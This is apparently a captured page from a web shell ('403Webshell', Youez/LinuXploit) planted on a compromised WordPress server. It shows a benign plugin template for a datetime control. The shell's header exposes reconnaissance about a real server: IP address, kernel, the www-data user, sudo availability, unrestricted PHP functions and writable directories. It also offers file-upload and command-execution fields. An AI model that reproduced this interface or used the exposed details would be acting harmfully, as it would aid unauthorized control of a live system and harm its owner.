403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.168
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/yme/wp-content/plugins/ocean-extra/includes/metabox/butterbean/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/yme/wp-content/plugins/ocean-extra/includes/metabox/butterbean/tmpl/control-datetime.php
<# if ( data.label ) { #>
	<span class="butterbean-label">{{ data.label }}</span>
<# } #>

<# if ( data.description ) { #>
	<span class="butterbean-description">{{{ data.description }}}</span>
<# } #>

<?php $month = '<label>
	<span class="screen-reader-text">{{ data.month.label }}</span>
	<select name="{{ data.month.name }}">
		<# _.each( data.month.choices, function( choice ) { #>
			<option value="{{ choice.num }}" <# if ( choice.num === data.month.value ) { #> selected="selected" <# } #>>{{ choice.label }}</option>
		<# } ) #>
	</select>
</label>';

$day = '<label>
	<span class="screen-reader-text">{{ data.day.label }}</span>
	<input type="text" name="{{ data.day.name }}" value="{{ data.day.value }}" {{{ data.day.attr }}} />
</label>';

$year = '<label>
	<span class="screen-reader-text">{{ data.year.label }}</span>
	<input type="text" name="{{ data.year.name }}" value="{{ data.year.value }}" {{{ data.year.attr }}} />
</label>';

$hour = '<label>
	<span class="screen-reader-text">{{ data.hour.label }}</span>
	<input type="text" name="{{ data.hour.name }}" value="{{ data.hour.value }}" {{{ data.hour.attr }}} />
</label>';

$minute = '<label>
	<span class="screen-reader-text">{{ data.minute.label }}</span>
	<input type="text" name="{{ data.minute.name }}" value="{{ data.minute.value }}" {{{ data.minute.attr }}} />
</label>';

$second = '<label>
	<span class="screen-reader-text">{{ data.second.label }}</span>
	<input type="text" name="{{ data.second.name }}" value="{{ data.second.value }}" {{{ data.second.attr }}} />
</label>'; ?>

<# if ( data.show_time ) { #>

	<?php // Translators: 1: month, 2: day, 3: year, 4: hour, 5: minute, 6: second.
	      printf( __( '%1$s %2$s, %3$s @ %4$s:%5$s:%6$s', 'butterbean' ), $month, $day, $year, $hour, $minute, $second );
	?>

<# } else { #>

	<?php // Translators: 1: month, 2: day, 3: year.
              printf( __( '%1$s %2$s, %3$s', 'butterbean' ), $month, $day, $year );
	?>

<# } #>

Youez - 2016 - github.com/yon3zu
LinuXploit